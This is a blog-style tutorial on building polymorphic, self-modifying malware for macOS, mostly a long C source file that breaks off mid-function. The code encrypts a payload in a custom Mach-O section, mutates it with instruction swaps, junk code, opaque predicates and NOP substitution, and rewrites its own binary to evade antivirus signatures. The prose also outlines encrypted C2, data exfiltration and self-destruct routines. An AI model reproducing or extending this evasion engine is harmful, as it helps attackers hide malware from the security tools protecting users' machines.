Today’s about writing fully custom malware targeting macOS. This is a cut into the world of polymorphic malware, this time on macOS. We’re talking raw Mach-O internals, low-level APIs, and what it really takes to slip past Apple’s security stack.
macOS malware is fun. Not the lame “steal your cat pics” kind, but the “how far can we contort a Mach-O before SIP loses its mind” kind. If you know me, you know I’ve got a soft spot for self-modifying code. Still doesn’t work half the time (yeah, yeah, skill issue).
This piece covers some known techniques and isn’t here to hand you malware, so don’t get it twisted. There’s nothing fancy or groundbreaking, just the basics anyone with some free time and bad ideas can mess around with.
As usual, I’ll lay out the mechanics first: theory, intent, then implementation. Fileless execution, runtime mutation, anti-debug, and pure native API surface. This isn’t for people looking to copy-paste and feel clever. It’s for those who want to understand how things work.
Some familiarity with malware development is expected. I don’t care if you’re on Linux or Windows; techniques may vary, but the core concepts stay the same: debugging and working low-level. If you’re new to macOS, check out the first article for the basics; it’ll get you ready for what’s coming.
Overview
In the first paper I put out, I kept things simple and used a stub to demo mutation without going deep into the engine itself. It was basic, close to the metal, and I didn’t want to overload the writeup. But on second thought? Fuck it, let me introduce a polymorphic generation engine for x86-64, built on old tricks but tuned for macOS on x86-64. This isn’t Aether. Totally separate. Just an example I’ll be using throughout, so don’t mix the two up.
All of it was tested on macOS 14+ (Sonoma). No promises it’ll run clean everywhere; your mileage may vary. If there’s a better source for something, I’ll link it. And if you’re done with the preamble: the code’s big, too much to unpack all at once. It’s the kind of code you just keep writing; every time an idea hits, you slap it in. Before you know it, you’ve got 3000+ lines.
If you want to dig through it yourself, grab it here. It’s raw, incomplete, and needs work to actually run. Some parts were left unfinished on purpose. And if something feels off, that’s not a mistake. Each architecture gets its own full instruction decoder, analyzer, and mutation engine: no shared logic, no shortcuts.
- Aether – a lightweight to mess with.
- x86-64 (Intel/AMD processors)
- ARM64 (Apple Silicon M1/M2/M3) - pretty basic.
At the center is the Mut8 engine, a control-flow-aware morpher for both x86 and ARM64. It deconstructs and rebuilds itself mid-execution, preserving logic while breaking signature-based assumptions. Then we turn to Mach-O internals: section injection in dead space, live patching, and relocations that treat memory layout as a suggestion. The binary redefines itself while it runs.
Beyond that, it’s a sandbox of sysctl edge cases, manual symbol resolution, and panic switches that incinerate the implant if things smell wrong. Encrypted C2, selective data exfiltration, and full teardown routines that erase both presence and origin. It’s designed to be annoying to analyze, difficult to persist in memory, and damn near impossible to pin down statically.
macOS isn’t immune. It isn’t malware-proof. If you know where to dig, the system hands you the tools, buried under layers of “security” that assume you won’t dig this deep.
This whole project came out of too many wasted hours reversing macOS malware and asking: how would I build this better? All the code here is just stubs, designed to keep things simple and highlight each technique as we go.
THE ARCHITECTURE
Self-mutating code dynamically modifies itself at runtime. This macOS implementation leans on the Mach-O format and system APIs, using a custom section in the __DATA segment to store and evolve the payload. The architecture breaks into two distinct phases:
Parent Process
Role: Initialization, decryption, mutation, re-encryption, and self-saving.
Flow:
– Generates fresh keys
– Decrypts the payload
– Mutates (instruction swapping, junk insertion)
– Re-encrypts and saves the updated code
Mutant Process
Role: Executes the evolved payload.
Flow:
– Retrieves updated code from Parent
– Executes the modified payload
– Continues the mutation cycle after triggers are hit
Core Idea:
The malware encrypts its own payload, decrypts and mutates it at runtime - a basic form of polymorphism. But don’t get ahead of yourself. We’ll break down the mutation engine, how it ticks internally, and the tricks it uses to stay persistent.
╔═════════════════════════════════════════════════════════════╗
║ INITIAL DESIGN ║
╠═════════════════════════════════════════════════════════════╣
║ 1. Validate Execution Environment ║
║ ├─ If running outside /tmp (~/Downloads): ║
║ │ └─ Copy self to /tmp and exec the copy ║
║ └─ Else: ║
║ └─ Self-destruct ║
║ ║
║ 2. Read encrypted payload and header from __DATA section ║
║ 3. Payload ║
║ ├─ If first run: ║
║ │ └─ Initialize payload (NOPs + payload), encrypt it, ║
║ │ update header (count = 1) ║
║ └─ Else: ║
║ ├─ Decrypt payload ║
║ ├─ Verify payload integrity (SHA‑256 hash) ║
║ ├─ Mutate payload (via disassembly-based mutation) ║
║ ├─ Generate new AES keys/IVs and re–encrypt payload ║
║ └─ Write updated header and payload back to binary ║
║ ║
║ 4. Load the decrypted payload ║
║ 5. Execute the payload (performs its task then ...) ║
║ 6. Mutation Cycle: ║
║ - On next run, the mutation cycle repeats or die ║
╚═════════════════════════════════════════════════════════════╝
First, let’s break down what signatures actually are. A signature is just a byte pattern antivirus software uses to flag malicious files. It could be a string, a small piece of code, a hash, anything that helps it hunt bad files. To dodge this, encryption gets layered in so antivirus can’t match known signatures.
Then there’s the payload, the actual file hidden behind the encryption. It doesn’t live on its own; it’s stuck onto the stub somehow. Maybe it’s embedded as a resource, slapped onto the end of a file, or tucked inside a new or existing section (we’ll get into that soon).
The stub is a tiny piece with one job: decrypt the payload and fire it in memory. Since the payload’s encrypted, antivirus can’t hit it directly, so it goes after the stub instead. But the stub’s so simple it’s easy to tweak, letting it slide past detection again and again.
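To make the signature idea concrete from the scanner's side, here is a minimal sketch of exact byte-pattern matching. `find_signature` is a hypothetical helper written for this illustration, not taken from any real antivirus product; real scanners layer wildcards, hashes, and heuristics on top of this.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: return the offset of the first exact match of
   `sig` inside `buf`, or -1 if the pattern is absent. */
long find_signature(const uint8_t *buf, size_t len,
                    const uint8_t *sig, size_t sig_len) {
    if (sig_len == 0 || sig_len > len) return -1;
    for (size_t i = 0; i + sig_len <= len; i++) {
        if (memcmp(buf + i, sig, sig_len) == 0) return (long)i;
    }
    return -1;
}
```

An exact match like this is brittle by design: a single changed byte inside the pattern makes the lookup return -1, which is why scanners end up targeting whatever part of a file stays constant.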
So, what’s the move? A few ways you can play it.
On one hand, you could stay minimal: a self-modifying loader that’s small, fast to write, and easy to maintain. It would pull off modest mutations, a couple quick changes here and there, enough to slip by without much noise. Upside? Your code stays lean, ugly, and yours.
“What starts as polymorphic finishes as metamorphic.”
On the flip side, you could go full metamorphic. Here, the loader doesn’t just tweak itself, it tears itself apart and rebuilds from scratch. New layout, fresh instruction flow, changed encryption every time it breathes. Even if a reverse engineer or scanner grabs one copy, the next generation’s a stranger.
Of course, this comes with its own mess. Making sure each transformation doesn’t wreck functionality is a whole problem on its own. You need heuristics: things like checking instruction counts, validating branches, and sanity-checking changes, just to make sure the thing doesn’t crash and burn.
This piece isn’t fully about mutation, but since it’s stitched into the design, here’s a small taste to get your hands dirty. It’s close to how our engine works (not giving away everything; the full thing’s on GitHub), but this snippet should give you the general idea.
Just know it’s half-baked.
“This is bad coding.”
mutator.c
/* 0x00s: Entry inc */
#include <stdio.h> // stdio
#include <stdlib.h> // mem alloc, exit
#include <fcntl.h>
#include <unistd.h> // read/write ops
#include <string.h>
#include <sys/random.h> // getentropy
#include <sys/mman.h> // mmap, mprotect
#include <sys/stat.h>
#include <sys/types.h>
#include <stdint.h>
#include <errno.h>
#include <signal.h>
#include <stdbool.h>
#include <time.h>
#include <mach-o/dyld.h> // _NSGetExecutablePath
#include <mach-o/getsect.h> // extract sect data
#include <mach-o/loader.h> // Mach-O defs
#include <capstone/capstone.h> // disasm
#include <CommonCrypto/CommonCryptor.h> // AES
#include <CommonCrypto/CommonDigest.h> // SHA256
/* Macros */
#define K 32 // AES key len
#define S 30 // Stub offset in payload
#define J 16 // Max junk size
#define P 4096 // Payload size/page size
/* Structs */
typedef struct __attribute__((packed)) {
uint8_t key[K]; // AES key
uint8_t iv[kCCBlockSizeAES128]; // AES IV
uint64_t seed; // RNG seed
uint32_t count; // Mutation counter
uint8_t hash[CC_SHA256_DIGEST_LENGTH]; // SHA256 checksum
} Encryption;
typedef struct {
uint8_t key[K]; // PRNG key
uint8_t iv[12]; // PRNG IV
uint8_t stream[64]; // Output block
size_t position; // Stream offset
uint64_t counter; // Block counter
} ChaCha;
typedef struct {
csh handle; // Capstone handle
cs_insn *insns; // Disasm buffer
size_t count; // Instr count
uint8_t *original; // Orig code ptr
size_t size; // Code size
ChaCha rng; // Mutation RNG state
} Evolution;
/* Provided by linker */
extern struct mach_header_64 _mh_execute_header;
/* Data section: holds encryption header + payload.
__attribute__((used)) prevents stripping. */
__attribute__((used, section("__DATA,__fdata"))) static uint8_t data[sizeof(Encryption) + P];
// https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CodeFootprint/Articles/MachOOverview.html
/* Arch config */
// https://github.com/capstone-engine/capstone
#if defined(__x86_64__)
#define ARCH_X86 1
#define ARC CS_ARCH_X86
#define MODE CS_MODE_64
#include <capstone/x86.h> // x86 defs
#elif defined(__arm64__)
#define ARCH_ARM 1
#define ARC CS_ARCH_ARM64
#define MODE 0
#include <capstone/arm64.h> // ARM64 defs
#else
#error "Unsupported arch"
#endif
/* Dummy payload: prints "Hello World" */
const uint8_t dummy[] = {
#ifdef ARCH_X86
0xeb, 0x1e, // jmp to payload
0x5e, // pop rsi
0xb8, 0x04, 0x00, 0x00, 0x02, // mov eax, 4
0xbf, 0x01, 0x00, 0x00, 0x00, // mov edi, 1
0xba, 0x0e, 0x00, 0x00, 0x00, // mov edx, 0x0e
0x0f, 0x05, // syscall (write)
0xb8, 0x01, 0x00, 0x00, 0x02, // mov eax, 1
0xbf, 0x00, 0x00, 0x00, 0x00, // mov edi, 0
0x0f, 0x05, // syscall (exit)
0xe8, 0xdd, 0xff, 0xff, 0xff, // call jmp target
0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f,
0x72, 0x6c, 0x64, 0x21, 0x0d, 0x0a // "Hello World!\r\n"
#elif defined(ARCH_ARM)
0x00, 0x80, 0x20, 0xd1, // sub sp, sp, #0x20
0x02, 0x00, 0x00, 0x90, // adrp x2, 0
0x22, 0x40, 0x00, 0xf9, // str x2, [sp]
0x20, 0x00, 0x80, 0x52, // mov w0, #1
0x21, 0x00, 0x80, 0x52, // mov w1, #1
0x40, 0x00, 0x80, 0x52, // mov w2, #14
0x00, 0x00, 0x00, 0x4d, // mov x16, #0x2000004
0x00, 0x00, 0x00, 0x01, // svc 0
0x20, 0x00, 0x80, 0x52, // mov w0, #1
0x00, 0x00, 0x00, 0x4d, // mov x16, #0x2000001
0x00, 0x00, 0x00, 0x01, // svc 0
0x00, 0x02, 0x1f, 0x61, // br #0x40
0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f,
0x72, 0x6c, 0x64, 0x21, 0x0d, 0x0a // "Hello World!\r\n"
#endif
};
const size_t len = sizeof(dummy); // payload len
/* ChaCha20 macros */
// Why AES and ChaCha20? Overkill maybe? Who know's.
// https://github.com/aead/chacha20
#define ROTL32(x, n) (((x) << (n)) | ((x) >> (32 - (n))))
#define QR(a, b, c, d) (a += b, d ^= a, d = ROTL32(d, 16), c += d, b ^= c, b = ROTL32(b, 12), \
a += b, d ^= a, d = ROTL32(d, 8), c += d, b ^= c, b = ROTL32(b, 7))
/* ChaCha20 block generator */
void chacha20_block(const uint32_t key[8], uint32_t counter, const uint32_t nonce[3], uint32_t out[16]) {
uint32_t state[16], orig[16], c[4] = {0x61707865, 0x3320646e, 0x79622d32, 0x6B206574};
state[0] = c[0]; state[1] = c[1]; state[2] = c[2]; state[3] = c[3];
memcpy(&state[4], key, 32); // load key
state[12] = counter;
memcpy(&state[13], nonce, 12); // load nonce
memcpy(orig, state, sizeof(state));
for (int i = 0; i < 10; i++) {
QR(state[0], state[4], state[8], state[12]);
QR(state[1], state[5], state[9], state[13]);
QR(state[2], state[6], state[10], state[14]);
QR(state[3], state[7], state[11], state[15]);
QR(state[0], state[5], state[10], state[15]);
QR(state[1], state[6], state[11], state[12]);
QR(state[2], state[7], state[8], state[13]);
QR(state[3], state[4], state[9], state[14]);
}
for (int i = 0; i < 16; i++)
out[i] = state[i] + orig[i];
}
/* Return 32-bit PRNG value */
uint32_t chacha20_random(ChaCha *rng) {
if (rng->position >= 64) {
uint32_t key[8], nonce[3];
memcpy(key, rng->key, 32);
memcpy(nonce, rng->iv, 12);
chacha20_block(key, (uint32_t)rng->counter, nonce, (uint32_t *)rng->stream);
rng->counter++;
rng->position = 0;
}
uint32_t v;
memcpy(&v, rng->stream + rng->position, sizeof(v));
rng->position += sizeof(v);
return v;
}
/* Initialize ChaCha state using seed hash */
void chacha20_init(ChaCha *rng, const uint8_t *seed, size_t len) {
uint8_t hash[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(seed, (CC_LONG)len, hash);
memcpy(rng->key, hash, K);
uint8_t ivh[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(hash, CC_SHA256_DIGEST_LENGTH, ivh);
memcpy(rng->iv, ivh, 12);
rng->position = 64;
rng->counter = ((uint64_t)time(NULL)) ^ getpid();
}
/* Check if branch target is valid */
bool branch(uint64_t t) {
#ifdef ARCH_X86
const uintptr_t START = 0x1000;
return (t >= START && t < (START + P));
#elif defined(ARCH_ARM)
const uintptr_t START = 0x10000;
return (t >= START && t < (START + P));
#else
return true;
#endif
}
/* Validate disassembled instruction */
bool verify(csh h, const cs_insn *i) {
if (!i) return false;
#ifdef ARCH_X86
cs_detail *d = i->detail;
if (!d) return false;
for (size_t j = 0; j < d->groups_count; j++) {
if (d->groups[j] == CS_GRP_PRIVILEGE) { // https://www.felixcloutier.com/x86/cli
fprintf(stderr, "(%s) rejected\n", i->mnemonic);
return false;
}
}
if ((i->id == X86_INS_JMP || i->id == X86_INS_CALL ||
i->id == X86_INS_JE || i->id == X86_INS_JNE ||
i->id == X86_INS_LOOP) &&
(d->x86.op_count > 0 && d->x86.operands[0].type == X86_OP_IMM)) {
if (!branch(d->x86.operands[0].imm)) {
fprintf(stderr, "Branch 0x%llx out\n", d->x86.operands[0].imm);
return false;
}
}
#elif defined(ARCH_ARM)
cs_detail *d = i->detail;
if (!d) return false;
for (size_t j = 0; j < d->groups_count; j++) {
if (d->groups[j] == CS_GRP_PRIVILEGE) {
fprintf(stderr, "(%s) rejected\n", i->mnemonic);
return false;
}
}
if ((i->id == ARM64_INS_B || i->id == ARM64_INS_BL ||
i->id == ARM64_INS_CBZ || i->id == ARM64_INS_CBNZ ||
i->id == ARM64_INS_TBB || i->id == ARM64_INS_TBZ) &&
(d->arm64.op_count > 0 && d->arm64.operands[0].type == ARM64_OP_IMM)) {
if (!branch(d->arm64.operands[0].imm)) {
fprintf(stderr, "Branch 0x%llx out\n", d->arm64.operands[0].imm);
return false;
}
}
#endif
return true;
}
/* Disassemble & validate code block */
bool ratify(csh h, const uint8_t *code, size_t len) {
cs_insn *i = NULL;
bool valid = true;
cs_option(h, CS_OPT_DETAIL, CS_OPT_ON);
size_t cnt = cs_disasm(h, code, len, 0, 1, &i);
if (cnt != 1) {
fprintf(stderr, "Disasm fail for bytes:");
for (size_t k = 0; k < len; k++) fprintf(stderr, " %02x", code[k]);
fprintf(stderr, "\n");
valid = false;
goto cleanup;
}
if (i[0].size != len) {
fprintf(stderr, "Expected %zu, got %u bytes\n", len, i[0].size);
valid = false;
goto cleanup;
}
if (!verify(h, i)) {
valid = false;
goto cleanup;
}
cleanup:
if (i) cs_free(i, 1);
return valid;
}
/* Mutation ptr */
typedef void (*Morph)(uint8_t *code, size_t sz, ChaCha *rng);
/* Swap two instructions of equal size */
void swap(uint8_t *code, size_t sz, ChaCha *rng) {
#ifdef ARCH_X86
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(CS_ARCH_X86, CS_MODE_64, &ctx.handle) != CS_ERR_OK) return;
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
if (ctx.count < 2) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
size_t i = chacha20_random(rng) % ctx.count;
size_t j = chacha20_random(rng) % ctx.count;
if (i == j || ctx.insns[i].size != ctx.insns[j].size) {
cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
return;
}
size_t off_i = ctx.insns[i].address - (uintptr_t)code;
size_t off_j = ctx.insns[j].address - (uintptr_t)code;
size_t insz = ctx.insns[i].size;
if (off_i + insz > sz || off_j + insz > sz) {
cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
return;
}
uint8_t temp_i[32], temp_j[32];
memcpy(temp_i, code + off_i, insz);
memcpy(temp_j, code + off_j, insz);
memcpy(code + off_i, temp_j, insz);
memcpy(code + off_j, temp_i, insz);
if (!ratify(ctx.handle, code + off_i, insz) ||
!ratify(ctx.handle, code + off_j, insz)) {
memcpy(code + off_i, temp_i, insz);
memcpy(code + off_j, temp_j, insz);
}
if (ctx.insns) cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
#elif defined(ARCH_ARM)
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(CS_ARCH_ARM64, 0, &ctx.handle) != CS_ERR_OK) return;
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
if (ctx.count < 2) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
size_t i = chacha20_random(rng) % ctx.count;
size_t j = chacha20_random(rng) % ctx.count;
if (i == j || ctx.insns[i].size != ctx.insns[j].size) {
cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
return;
}
size_t off_i = ctx.insns[i].address - (uintptr_t)code;
size_t off_j = ctx.insns[j].address - (uintptr_t)code;
size_t insz = ctx.insns[i].size;
if (off_i + insz > sz || off_j + insz > sz) {
cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
return;
}
uint8_t temp_i[32], temp_j[32];
memcpy(temp_i, code + off_i, insz);
memcpy(temp_j, code + off_j, insz);
memcpy(code + off_i, temp_j, insz);
memcpy(code + off_j, temp_i, insz);
if (!ratify(ctx.handle, code + off_i, insz) ||
!ratify(ctx.handle, code + off_j, insz)) {
memcpy(code + off_i, temp_i, insz);
memcpy(code + off_j, temp_j, insz);
}
if (ctx.insns) cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
#endif
}
/* Insert junk opcodes at random spot */
void trash(uint8_t *code, size_t sz, ChaCha *rng) {
#ifdef ARCH_X86
if (sz >= J) {
size_t pos = chacha20_random(rng) % (sz - J);
uint32_t choice = chacha20_random(rng) % 4;
size_t len = 0;
switch (choice) {
case 0: {
if (sz - pos < 8) break;
uint8_t seq[8] = {0x48, 0x83, 0xC0, 0x01, 0x48, 0x83, 0xE8, 0x01};
memcpy(code + pos, seq, 8);
len = 8;
} break;
case 1: {
if (sz - pos < 2) break;
uint8_t seq[2] = {0x50, 0x58};
memcpy(code + pos, seq, 2);
len = 2;
} break;
case 2: {
if (sz - pos < 10) break;
uint32_t imm = chacha20_random(rng);
uint8_t seq[10];
seq[0] = 0xB8;
memcpy(seq + 1, &imm, 4);
seq[5] = 0x35;
memcpy(seq + 6, &imm, 4);
memcpy(code + pos, seq, 10);
len = 10;
} break;
case 3: {
if (sz - pos < 3) break;
uint8_t seq[3] = {0x48, 0x31, 0xC0};
memcpy(code + pos, seq, 3);
len = 3;
} break;
default:
break;
}
if (len > 0) {
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(ARC, MODE, &ctx.handle) != CS_ERR_OK) return;
if (!ratify(ctx.handle, code + pos, len)) {
memset(code + pos, 0x90, len);
}
cs_close(&ctx.handle);
}
}
#elif defined(ARCH_ARM)
if (sz >= J) {
size_t pos = chacha20_random(rng) % (sz - J);
uint32_t choice = chacha20_random(rng) % 4;
size_t len = 0;
switch (choice) {
case 0: {
if (sz - pos < 4) break;
uint8_t seq[4] = {0x00, 0x00, 0x80, 0xd2};
memcpy(code + pos, seq, 4);
len = 4;
} break;
case 1: {
if (sz - pos < 4) break;
uint8_t seq[4] = {0x00, 0x00, 0x80, 0x12};
memcpy(code + pos, seq, 4);
len = 4;
} break;
case 2: {
if (sz - pos < 8) break;
uint32_t imm = chacha20_random(rng);
uint8_t seq[8];
seq[0] = 0x00;
seq[1] = 0x00;
seq[2] = 0x80;
seq[3] = 0xd2;
memcpy(seq + 4, &imm, 4);
memcpy(code + pos, seq, 8);
len = 8;
} break;
case 3: {
if (sz - pos < 4) break;
uint8_t seq[4] = {0x00, 0x20, 0x80, 0xd2};
memcpy(code + pos, seq, 4);
len = 4;
} break;
default:
break;
}
if (len > 0) {
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(ARC, MODE, &ctx.handle) != CS_ERR_OK) return;
if (!ratify(ctx.handle, code + pos, len)) {
memset(code + pos, 0x90, len);
}
cs_close(&ctx.handle);
}
}
#endif
}
/* Insert opaque: very simple, I recommend a disassembler to understand. */
void Opaque(uint8_t *code, size_t sz, ChaCha *rng) {
#ifdef ARCH_X86
if (sz < 12) return;
uint32_t imm = chacha20_random(rng);
uint8_t seq[12];
seq[0] = 0xB8;
memcpy(seq + 1, &imm, 4);
seq[5] = 0x3D;
memcpy(seq + 6, &imm, 4);
seq[10] = 0x74;
seq[11] = 0x00;
size_t pos = chacha20_random(rng) % (sz - 12);
memcpy(code + pos, seq, 12);
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(ARC, MODE, &ctx.handle) != CS_ERR_OK) return;
if (!ratify(ctx.handle, code + pos, 12)) {
memset(code + pos, 0x90, 12);
}
cs_close(&ctx.handle);
#elif defined(ARCH_ARM)
if (sz < 12) return;
uint32_t imm = chacha20_random(rng);
uint8_t seq[12];
seq[0] = 0x00;
seq[1] = 0x00;
seq[2] = 0x80;
seq[3] = 0x52;
memcpy(seq + 4, &imm, 4);
seq[8] = 0x00;
seq[9] = 0x00;
seq[10] = 0x80;
seq[11] = 0x72;
size_t pos = chacha20_random(rng) % (sz - 12);
memcpy(code + pos, seq, 12);
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(ARC, MODE, &ctx.handle) != CS_ERR_OK) return;
if (!ratify(ctx.handle, code + pos, 12)) {
memset(code + pos, 0x90, 12);
}
cs_close(&ctx.handle);
#endif
}
/* Replace an instruction with NOPs */
void nopOut(uint8_t *code, size_t sz, ChaCha *rng) {
#ifdef ARCH_X86
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(CS_ARCH_X86, CS_MODE_64, &ctx.handle) != CS_ERR_OK) return;
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
size_t i = chacha20_random(rng) % ctx.count;
size_t off = ctx.insns[i].address - (uintptr_t)code;
size_t insz = ctx.insns[i].size;
if (off + insz > sz) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
uint8_t bak[32];
memcpy(bak, code + off, insz);
if (insz >= 1 && insz <= 10) {
static const uint8_t nop_sequences[][10] = {
{0x90},
{0x66, 0x90},
{0x0F, 0x1F, 0x00},
{0x0F, 0x1F, 0x40, 0x00},
{0x0F, 0x1F, 0x44, 0x00, 0x00},
{0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00},
{0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00},
{0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00},
{0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00},
{0x0F, 0x1F, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
};
memcpy(code + off, nop_sequences[insz - 1], insz);
} else {
memset(code + off, 0x90, insz);
}
if (!ratify(ctx.handle, code + off, insz)) {
memcpy(code + off, bak, insz);
}
if (ctx.insns) cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
#elif defined(ARCH_ARM)
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(CS_ARCH_ARM64, 0, &ctx.handle) != CS_ERR_OK) return;
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
size_t i = chacha20_random(rng) % ctx.count;
size_t off = ctx.insns[i].address - (uintptr_t)code;
size_t insz = ctx.insns[i].size;
if (off + insz > sz) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
uint8_t bak[32];
memcpy(bak, code + off, insz);
if (insz >= 1 && insz <= 4) {
static const uint8_t nop_sequences[][4] = {
{0x1f, 0x20, 0x03, 0xd5},
{0x1f, 0x20, 0x03, 0xd5},
{0x1f, 0x20, 0x03, 0xd5},
{0x1f, 0x20, 0x03, 0xd5}
};
memcpy(code + off, nop_sequences[insz - 1], insz);
} else {
memset(code + off, 0x1f, insz);
}
if (!ratify(ctx.handle, code + off, insz)) {
memcpy(code + off, bak, insz);
}
if (ctx.insns) cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
#endif
}
// str
Morph engine[] = {
swap,
trash,
Opaque,
nopOut
};
/* Mutation routine: apply multiple passes and revert if too degraded */
void mutate(uint8_t *code, size_t sz, ChaCha *rng) {
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
#if defined(ARCH_X86)
if (cs_open(CS_ARCH_X86, CS_MODE_64, &ctx.handle) != CS_ERR_OK) return;
#elif defined(ARCH_ARM)
if (cs_open(CS_ARCH_ARM64, 0, &ctx.handle) != CS_ERR_OK) return;
#endif
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
uint8_t *backup = malloc(sz);
if (!backup) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
memcpy(backup, code, sz);
size_t original_count = ctx.count;
for (int pass = 0; pass < 3; pass++) {
Morph strategy = engine[chacha20_random(&ctx.rng) % (sizeof(engine) / sizeof(engine[0]))];
strategy(code, sz, &ctx.rng);
}
cs_insn *final = NULL;
size_t final_count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &final);
if (final_count < (original_count * 0.9)) {
memcpy(code, backup, sz);
}
free(backup);
if (ctx.insns) cs_free(ctx.insns, ctx.count);
if (final) cs_free(final, final_count);
cs_close(&ctx.handle);
*rng = ctx.rng;
}
/* Mutate payload region, skipping stub */
void mutate_payload(uint8_t *code, size_t sz, ChaCha *rng) {
if (sz <= S) return;
uint8_t *target = code + S;
size_t target_size = sz - S;
#ifdef MU
mutate(target, target_size, rng);
#else
// No mutation: MU flag off.
#endif
}
/* Volatile memcpy to defeat optimizations */
void _memcpy(void *dst, const void *src, size_t len) {
volatile uint8_t *d = dst;
const volatile uint8_t *s = src;
while (len--) *d++ = *s++;
}
/* Volatile zeroing */
void zer(void *p, size_t len) {
volatile uint8_t *x = p;
while (len--) *x++ = 0;
}
/* AES encrypt/decrypt wrapper */
void crypt_payload(int enc, const uint8_t *key, const uint8_t *iv,
const uint8_t *in, uint8_t *out, size_t len) {
CCCryptorRef cr;
CCCryptorStatus st = CCCryptorCreate(enc ? kCCEncrypt : kCCDecrypt,
kCCAlgorithmAES, 0, key, K, iv, &cr);
if (st != kCCSuccess) return;
size_t moved = 0;
if (CCCryptorUpdate(cr, in, len, out, len, &moved) != kCCSuccess) {
CCCryptorRelease(cr);
return;
}
size_t fin = 0;
CCCryptorFinal(cr, out + moved, len - moved, &fin);
CCCryptorRelease(cr);
}
#define cipher(k, iv, in, out, len) crypt_payload(1, k, iv, in, out, len)
#define decipher(k, iv, in, out, len) crypt_payload(0, k, iv, in, out, len)
/* Write back modified __fdata section */
void save(uint8_t *data, size_t sz) {
// https://developer.apple.com/documentation/foundation/nsbundle/1409078-executablepath
char path[1024];
uint32_t ps = sizeof(path);
if (_NSGetExecutablePath(path, &ps) != 0) return;
int fd = open(path, O_RDWR);
if (fd < 0) { perror("open"); return; }
struct mach_header_64 *h = &_mh_execute_header; // https://developer.apple.com/documentation/kernel/mach_header_64
uint64_t off = 0;
struct load_command *lc = (struct load_command *)((char *)h + sizeof(*h));
for (uint32_t i = 0; i < h->ncmds; i++) {
if (lc->cmd == LC_SEGMENT_64) {
struct segment_command_64 *seg = (struct segment_command_64 *)lc; // https://developer.apple.com/documentation/kernel/segment_command_64
struct section_64 *sec = (struct section_64 *)((char *)seg + sizeof(*seg));
for (uint32_t j = 0; j < seg->nsects; j++) {
if (!strcmp(sec[j].sectname, "__fdata") &&
!strcmp(sec[j].segname, "__DATA")) {
off = sec[j].offset;
size_t section_size = sec[j].size;
if (sz > section_size) {
fprintf(stderr, "Got %zu bytes, only %llu available\n", sz, section_size);
close(fd);
return;
}
break;
}
}
}
lc = (struct load_command *)((char *)lc + lc->cmdsize); // https://developer.apple.com/documentation/kernel/load_command/
}
if (off == 0) { fprintf(stderr, "Section not found\n"); close(fd); return; }
if (lseek(fd, off, SEEK_SET) == -1) { perror("lseek"); close(fd); return; }
size_t tot = 0;
while (tot < sz) {
ssize_t w = write(fd, data + tot, sz - tot);
if (w <= 0) { perror("write"); break; }
tot += w;
}
if (tot != sz) fprintf(stderr, "Incomplete write\n");
close(fd);
}
/* Check for privileged ops */
bool check_priv(uint8_t *code, size_t sz) {
csh h;
cs_insn *ins = NULL;
bool priv = false;
if (cs_open(ARC, MODE, &h) != CS_ERR_OK) {
fprintf(stderr, "Capstone fail\n");
return true;
}
cs_option(h, CS_OPT_DETAIL, CS_OPT_ON);
size_t cnt = cs_disasm(h, code, sz, (uintptr_t)code, 0, &ins);
if (cnt > 0) {
for (size_t i = 0; i < cnt; i++) {
#ifdef ARCH_X86
cs_detail *d = ins[i].detail;
for (size_t j = 0; j < d->groups_count; j++) {
if (d->groups[j] == CS_GRP_PRIVILEGE) {
